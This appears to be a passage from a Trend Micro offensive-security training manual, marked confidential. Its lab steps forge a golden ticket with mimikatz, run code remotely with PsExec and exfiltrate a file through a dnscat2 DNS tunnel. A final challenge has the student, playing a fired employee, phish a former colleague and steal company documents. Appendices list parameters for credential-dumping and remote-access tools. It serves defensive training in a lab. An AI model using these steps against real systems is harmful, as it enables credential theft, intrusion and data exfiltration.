33. On the command prompt, list the logon sessions and NTLM credentials again using wce:
wce -l
37. Execute the Attack.exe file remotely on the Victim machine using PsExec.exe:
cd..
PSTools\PsExec.exe \\192.168.100.121 -c Attack.exe
38. Verify if the process was executed properly by displaying the contents of Attack.txt:
more \\192.168.100.121\C$\Attack.txt
The results show that the process was executed by the Administrator account.
39. Reboot the Attacker machine in preparation of the next exercise.
Golden Tickets for the domain can be obtained using the NTLM hash of the Key Distribution Service
account, KRBTGT. This account allows generation of TGTs for any account in Active Directory.
1. Access Attacker machine.
2. Open command prompt and run the following command:
pushd \\Server\C$
The pushd command accepts either a network path or a local drive letter and path. If a network
path is specified, pushd will create a temporary drive pointing to the specified network resource
and will change into the temporary drive.
3. The pushd command fails, as we currently have no access rights:
4. We will need the SID of the KRBTGT service account. Run the following commands:
5. This will open notepad, displaying the Object Security ID of the KRBTGT service account:
Highlight the SID as shown in the screenshot. Do not close Notepad, as we require the SID during
the exercise.
6. In the command prompt, navigate to “C:\Tools”:
cd \tools
notepad hashes.txt
Highlight the NTLM hash of user krbtgt(current-disabled). Leave the Notepad open, as we
require the contents for the next steps.
8. Back in the command prompt, navigate to the “Mimikatz” folder and start mimikatz.exe:
cd mimikatz\x64
mimikatz.exe
Note: Refer to Appendix B.14 on page 119 for a list of command examples in mimikatz.
10. Golden tickets can be created for valid domain accounts or for accounts that do not exist. We can
now paste the information we gathered earlier:
User is used for the name of the user account the ticket will be created for. This can be an
existing account name, but it does not have to be.
RC4 stands for the NTLM hash, using the highlighted value from step 7.
SID will insert a SID into the SIDHistory attribute of the account in the ticket. This is useful to
authenticate across domains. This uses the SID value from step 5, without the last 4 characters.
ID for the RID of the account you will be impersonating, here we use the default administrator ID
of 500.
Using ptt allows to inject the created ticket into the current session.
Note: Please ensure, the “rc4” and “sid” values are the same as discovered in the notepads in steps
5 and 7. If not, please change those values accordingly.
11. Once executed, Mimikatz will show the following screen, indicating that the Golden ticket has
been successfully submitted:
12. The generated golden ticket can now be used. Launch a command prompt using the following
command:
misc::cmd
whoami
pushd \\Server\c$
Notice we automatically switched into drive Y:. This is done via the pushd command, which
created the connection and mapped it temporarily to a new drive letter.
16. Navigate into Windows’ database directory:
cd windows\ntds
dir
18. This will return the command prompt from Server onto the Attacker machine. Type in the
following commands to check for their values:
hostname
whoami
ipconfig
Hostname will be Server, as the command prompt is running on the Server machine. This is also
the reason why ipconfig returns 192.168.100.131
More important however is the output of the command “whoami”. The current user is changed
to the fake user we created in step 10, krbtgthacker.
Even though the user is non-existent, we were still able to list a system directory in step 16, which
proves we have Administrator rights, thanks to the RID of 500 (see step 10).
Note: As a summary, if the SID and NTLM hash of the KRBTGT service account can be acquired, it is
very easy to gain access and elevate the privileges of an unknown user.
Final Challenge
In the final challenge for Advanced Threat Defense - Cybercrime Operations & Attack
Methodologies,
the student will demonstrate the ability of:
• Infiltrating a target environment
• Exfiltration of documents
100 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Final Challenge
Task
The final challenge consists of two tasks:
• Infiltrate a target network
• Exfiltrate an important document
Environment
The final challenge uses a new environment:
Background Information
In this exercise, you will be playing the role of a hacker named Harry. Your goal is to look for and
collect important documents from your previous employer who just recently fired you.
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 101
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
Based on the information you have read from the email, George is making last minute changes to
his presentation using data that he's requesting from outsourced developers. These outsourced
developers are using the email address “Instructor@ACE202.TrendMicro” to communicate with.
George also mentioned that he urgently needs the updated version of the "ACE202.Exercise.doc"
file; he will be monitoring his email from the time he sent the email up to one hour prior to his
presentation. He also requested that they use "ACE-202 Exercise" as the subject so he can
immediately spot the email.
Prior to this, since you have worked for this company before, you know the following:
• You know of five computers that you can utilize for this operation.
• The mail server’s IP address is 192.168.33.91.
• Servers of this organization are isolated in their own subnet (192.168.33.0/24).
These servers cannot be accessed from the Internet directly except for the SMTP mail server.
However, George's computer can access a computer named SRV-Door on the server subnet.
• The server, where important documents are stored, is SRV-Doc. This server also belongs to
the same subnet as that of the SRV-Door.
• On the same subnet of the servers is a domain controller, SRV-DC, whose user frequently
connects to the SRV-Doc to upload important files.
Objectives:
Use any of the techniques you've learned from this course to infiltrate the target user's
machine using the resources you have.
• Gain access to George's machine.
• Copy your hacking tools to the infected machine.
Guide Questions:
What is the best point of entry knowing that you have the following at your disposal:
• Email address, name, and IP address of an employee
- Email: George@ACE202.TrendMicro
- Name: George
- IP Address: 172.22.22.61
• Critical information and "human" vector that can be exploited
- George is waiting for an "ACE202.Exercise.doc" file
• Trojan backdoor that grants remote access to an attacker
- Trojan: C:\Tools\replace-sethc-with-cmd.exer
102 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Final Challenge
You know there are important documents stored on SRV-Doc, particularly a DOCX file. You will
need to find a way to get to the SRV-Doc machine in order to get that specific DOCX file, which
name and location are currently unknown.
There are three computers in the internal network. Since you have worked for this company
before, you know one of your ex-colleagues uses the SRV-DC machine to constantly access the
SRV-Doc machine.
Objectives
Use any of the techniques you've learned from this course to infiltrate the organization's network
and retrieve the DOCX file from the SRV-Doc document server:
• Assume George's identity to gain access to the other resources on the network:
- Sniff for passwords
- Use hash passing
• Gain access to the SRV-Door and/or the SRV-Doc machines:
- Determine if George has access to the machines you want to infiltrate; or
- Assume the identity of other people who have access to the resources you need; or
- Create user accounts that have the credentials you need.
• Copy document files from the SRV-Doc machine and determine which ones are useful.
Guide Questions:
• With access to George's machines, what information can be compromised using your hacking
tools?
- Can you retrieve passwords?
- Do you have ready access to other resources on the network?
• By exploring your options, what errors or roadblocks did you encounter?
Are these errors easily bypassed or solved using any of the techniques you've learned?
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 103
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
104 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Optional Activities
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 105
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
106 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Optional Activities
DNS Tunneling
This optional activity demonstrates how to utilize DNS tunneling.
Of importance here is that any IP traffic, no matter which nature, can be encapsulated within the DNS
protocol. This allows for attackers to hide their communication, such as C&C, Lateral Movement
activities or Data Exfiltration, and ensure it is not detected easily by their targets.
For this exercise we will utilize the tool dnscat2 to create a DNS tunnel and perform internal
reconnaissance and data exfiltration.
Note: Refer to Appendix B.15 on page 119 for further dnscat2 command and parameter examples.
With this command, systemd-resolved disables Network Name Resolution Manager. This allows us
to utilize netcat binding to dnscat.
4. Navigate to “dnscat2/server” folder:
cd dnscat2/server
5. Start dnscat2 server and connect to the domain name supplier.tm. Type the command:
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 107
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
cd Desktop\Exercise\dns_tunneling
dnscat2.exe supplier.tm
10. This will execute dnscat2 with the established domain name to create a session:
Note: If you encounter issues establishing a connection, such as “Too big”, please ensure the DNS
server service on the server machine is running.
The line New window created: 1 indicates that a new session has been established.
The dnscat2 UI calls their sessions “windows”. The default window is called the 'main' window.
13. Type the following command to get a list of all available windows:.
window
14. You'll note that there are two windows: window 0 is the main window, and window 1 is the
listener (technically referred to as the “tunnel driver”).
15. From any window that accepts commands (main and command sessions), you can type help to
get a list of commands:
help
16. Use the window command to interact with window 1, which is the established session with the
Victim machine:
window -i 1
108 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Optional Activities
download finance.txt
Note: dnscat2 will only be able to download files which are located in the same folder as the
dnscat2 client. If you wish to download files currently located in the “Downloads” folder, you
will either need to execute dnscat2 from that directory or move the files into the dnscat2
directory using a shell.
18. The dnscat2 console on Ubuntu will display the success of the download:
19. The download can also be seen on the dnscat2 console on the Victim machine:
cat dnscat2/server/finance.txt
shell
26. Once executed, press <CTRL>+<Z> followed by <ENTER> to go back to the main window of
dnscat2.
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 109
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
window
You can see the [*] icon, that means that there's been activity since the last time we looked at
them.
29. Interact with the new created session:
window -i 2
30. Run the following commands to confirm whether the shell is executed on the Victim machine:
whoami
ipconfig
31. Both commands will return information about the Victim machine:
32. Go back to the main window of dnscat2 by pressing <CTRL> + <Z> followed by <ENTER>.
33. Switch to the Victim machine.
34. Open Wireshark. We can confirm, by analyzing the recorded packets, that all activities between
dnscat2 client and server were encapsulated within the DNS protocol:
110 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Optional Activities
kill 2
window
window -i 1
shutdown
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 111
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
112 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Commands & Parameters
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 113
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
114 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Commands & Parameters
Netcat
Netcat offers multiple parameters for specific actions:
Parameter Description
-l Listen mode (default: Client)
Listen harder; only supported on Windows OS. This will force
-L netcat to continue listening after a client disconnects.
-u UDP mode (default: TCP)
-p Port to either listen on or connect to; depending on listen mode.
Pupy
Pupy is a popular choice for Remote Access Tools, providing a feature set for establishing C&C
communication as well as lateral movement. The project page of Pupy can be found at https://
github.com/n1nj4sec/pupy.
migrate -p explorer.exe migrate the Pupy client process into a different process for
obfuscation, here: explorer.exe
getpid list the process id of the Pupy client
sessions list all current sessions
sessions -k 1 kill a session with specific id, here: 1
PUPY COMMANDS & PARAMETERS
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 115
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
net
The built-in command “net” provides a multitude of different options and parameters. The following
table provides a list of examples, how “net” can be utilized:
Parameter Description
net use connect to network shares
net use X: \\192.168.0.1\share connect to network share \\192.168.0.1\share, and map it as
/persistent:yes drive X: permanently (persistent:yes)
net use X: /delete delete the mapped drive at X:
create or delete local users or display information of a specific
net user
user
net user bob test /add add a new user “bob” with password “test”
net user bob /delete delete user “bob”
net user bob display information about user “bob”
net localgroup create, delete user groups or add users to a specific group
show information and users belonging to the group
net localgroup administrators “administrators”
net localgroup administrators add user “bob” to the administrators group
bob /add
NET COMMANDS & PARAMETERS
gsecdump
gsecdump allows to dump password hashes of local users on Windows operating systems:
Parameter Description
-h display all available parameters
-a dump everything
-s dump hashes from SAM / Active Directory
-l dump LSA secrets
-u dump hashes from active logon sessions
-w dump wifi connections
-S force elevation to SYSTEM
GSECDUMP PARAMETERS
116 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Commands & Parameters
samdump2
samdump2 allows dumping password hashes:
Parameter Description
-h display overview of available parameters
-d display debug information
-l extract all available hashes
-o output the hash dumps into a file
SAMDUMP2 PARAMETERS
John-The-Ripper
John-the-Ripper can be utilized to try to crack passwords using the brute force or dictionary
techniques. Below table lists few of the important parameters for john:
Parameter Description
no parameter provided display help and list all available parameters
-format specifies the format of the passed information, e.g. nt, md5 etc.
-wordlist specify a wordlist to use
-pot specify a different pot file than john.pot
JOHN-THE-RIPPER PARAMETERS
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 117
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
Powershell Empire
Powershell Empire allows injection of malicious code into the memory, by providing loaders for the
Victims. The project page of Powershell Empire can be found at https://github.com/EmpireProject/
Empire
The table below lists few examples of commands, which can be utilized within Powershell Empire:
PsExec
PsExec, of the Sysinternals Suite, allows remote code execution of target machines. Further
information can be found at https://docs.microsoft.com/en-us/sysinternals/downloads/psexec.
Parameter Description
no parameter provided help overview of all available parameters
specify target machine, if not specified it will run on local machine.
computer (*) can be specified for all computers in current domain
-c copy the specified program to the target prior to execution
-h try to elevate program execution
-s run the process with SYSTEM account
-u specify user to run process as
-p specify password for user
PSEXEC PARAMETERS
118 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Commands & Parameters
at
The at command allows to remotely configure scheduled tasks on Windows operating systems.
Parameter Description
/? print help for at command
\\computername specify target machine to run task on
time specify time when scheduled task should run
command specify the command to run at scheduled time
/interactive allow the task to interact with desktop session
/delete deletes a task, id has to be specified
/every:[date] run the scheduled task every hour / day / week / month
AT PARAMETERS
B.10schtasks
schtasks has superseded the at command on newer Windows operating systems.
Parameter Description
no parameter provided list all current scheduled tasks
/? display list of commands available
/RUN run a specific task
/QUERY query information about a specific task
/S specifies the remote system
/TN specify the task name querying / running / deleting
WMIC PARAMETERS
B.11 wmic
wmic - Windows Management Interface Console - provides a full feature set to manipulate any data or
processes on Windows operating systems. As the list of options is very extensive, the below table
focuses on explanation on parameters used throughout the exercises.
Parameter Description
wmic -? lists all available options for wmic
/node: specify the target machine to connect to
/user: specify the user for the connection
/password: specify the password for the selected user
process call create “name” create and execute a new process “name”
WMIC PARAMETERS
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 119
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
B.12netsh
The netsh tool is a built-in command line, providing access to network related configuration.
Command / Parameter Description
/? list all available options
advfirewall change settings of Windows Firewall
advfirewall reset reset firewall to default settings
advfirewall firewall adjust profile of firewall
portproxy set up port proxy, also known as port forwarding or NAT
portproxy add add a new port forwarding rule
interface change configuration of a network interface
interface set interface
name=”lan1” configure the interface called “lan1”
B.13wce
Windows credentials editor allows password hash dumps, displaying cleartext passwords as well as
passing the hash on Windows operating systems.
Parameter Description
-? list all available options
-s change current NTLM credentials
-l list all available NTLM credentials
-r same as -l, but refreshes automatically every 5 seconds
-w dump cleartext passwords
-k read kerberos tickets from file
WCE PARAMETERS
120 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Commands & Parameters
B.14mimikatz
A well known tool, mimkatz can be used to extract plaintexts passwords, hashes, PIN codes and
kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build
Golden tickets. The project page can be found at https://github.com/gentilkiwi/mimikatz.
B.15dnscat2
dnscat2 is a tool to create tunnel via DNS traffic, allowing to hide malicious activities within a valid
protocol. The project page can be found at https://github.com/iagox86/dnscat2.
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 121
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
122 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Protocol Response Codes
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 123
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
124 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Table of Contents: Tables
Introduction
Class Setup: Virtual Machine Descriptions ........................................................................ 9
Class Setup: User Credentials ............................................................................................ 9
Point of Entry
Lateral Movement
ophcrack: Accounts with Passwords “not found” ............................................................. 44
MAC and IP Address Mapping ........................................................................................... 49
Privilege Escalation: Process Integrity Level ..................................................................... 61
Final Challenge
Final Challenge: Login Credentials .......................................................................................... 101
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 125
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
126 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Table of Contents: Images and Screenshots
Introduction
Trend Micro Training Cloud Access: Training Area ........................................................... 7
Trend Micro Training Cloud Access: List of RDP Files ................................................... 8
Trend Micro Training Cloud Access: Unknown Publisher Warning ................................... 8
Trend Micro Training Cloud Access: vApp Overview ......................................................... 8
Class Setup: Virtual Environment ...................................................................................... 9
Accessing The Virtual Machines: Open the vApp .............................................................. 10
Accessing the Virtual Machines: vApp Startup.................................................................. 10
Accessing The Virtual Machines: “Virtual Machines” Tab .................................................... 11
Point of Entry
Preparing Email: Preparing RTLO ...................................................................................... 15
Preparing Email: Placing RTLO Character ......................................................................... 15
Preparing Email: Text Changes With RTLO Applied .......................................................... 16
Preparing Email: Set Location For LTRO Character. ......................................................... 16
Preparing Email: Text Changes With LTRO Applied .......................................................... 16
Preparing Email: Rename Payload.exe ................................................................................... 17
Preparing Email: File Renamed ............................................................................................... 17
Preparing Email: Change View of Windows Explorer ............................................................ 17
Sending Email: Account Selection ............................................................................................ 18
Sending Email: Viewing Account Settings ........................................................................ 18
Sending Email: Outgoing Mail Server Settings ..................................................................... 18
Sending Email: Confirm SMTP Settings ............................................................................ 18
Sending Email: Spoofing Email Sender ............................................................................. 19
Sending Email: Attaching Malicious File................................................................................ 19
Sending Email: Malicious Email Received ......................................................................... 20
Sending Email: Saving Attachment ................................................................................... 20
Sending Email: Confirmation of No Malicious Files in %tmp% ........................................ 20
Sending Email: Open Malicious File ....................................................................................... 21
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 127
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
Lateral Movement
LM & NTLM Hashes: Hashes of Empty Passwords............................................................. 37
LM & NTLM Hashes: LM Hash Case-Insensitive ................................................................. 38
LM & NTLM Hashes: LM Hash 7 Character Split ................................................................ 39
LM & NTLM Hashes: LM Hash 14 Character Limitation ..................................................... 39
LM & NTLM Hashes: Local Security Policy Management .................................................. 40
LM & NTLM Hashes: Security Policy on Windows 7 Preventing LM Hash Being
Stored ................................................................................................................................41
ophcrack: Select Components To Install ............................................................................ 43
ophcrack: Select PWDUMP File ......................................................................................... 43
ophcrack: Registration of XP free fast Table ................................................................ 44
John-The-Ripper: Brute Force.......................................................................................45
John-The-Ripper: John.pot Stores Successfully Cracked Passwords ............................45
Cain & Abel Installation: WinPcap ..................................................................................... 46
Cain & Abel Installation: Setup WinPcap Driver at Boot ................................................... 46
ARP Cache: Domain Network “Connected” ....................................................................... 47
ARP Cache: Attacker Not Listed Yet............................................................................. 47
ARP Cache: Attacker Is Listed Once Pinged .................................................................. 48
ARP Poisoning: Cain & Abel Enable Sniffer ........................................................................ 48
ARP Poisoning: Sniffer Tab ................................................................................................. 48
ARP Poisoning: Scanning MAC Addresses .................................................................... 48
ARP Poisoning: Scanning All Hosts ..................................................................................... 49
ARP Poisoning: Scan Results ......................................................................................... 49
ARP Poisoning: APR Tab ............................................................................................... 49
ARP Poisoning: Add To List ........................................................................................... 50
ARP Poisoning: Selecting the Targets ........................................................................... 50
ARP Poisoning: Targets Listed ...................................................................................... 50
ARP Poisoning: Start Poisoning ......................................................................................... 51
ARP Poisoning: Passwords Tab ......................................................................................... 51
ARP Poisoning: Displaying Passwords ................................................................................ 52
ARP Poisoning: Stopping Activities .................................................................................... 52
Powershell Empire: Start Screen ....................................................................................... 53
Powershell Empire: Starting Listener ...........................................................................54
128 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Table of Contents: Images and Screenshots
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 129
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
Final Challenge
Final Challenge: Environment ................................................................................................. 101
130 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Table of Contents: Images and Screenshots
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 131
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
132 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential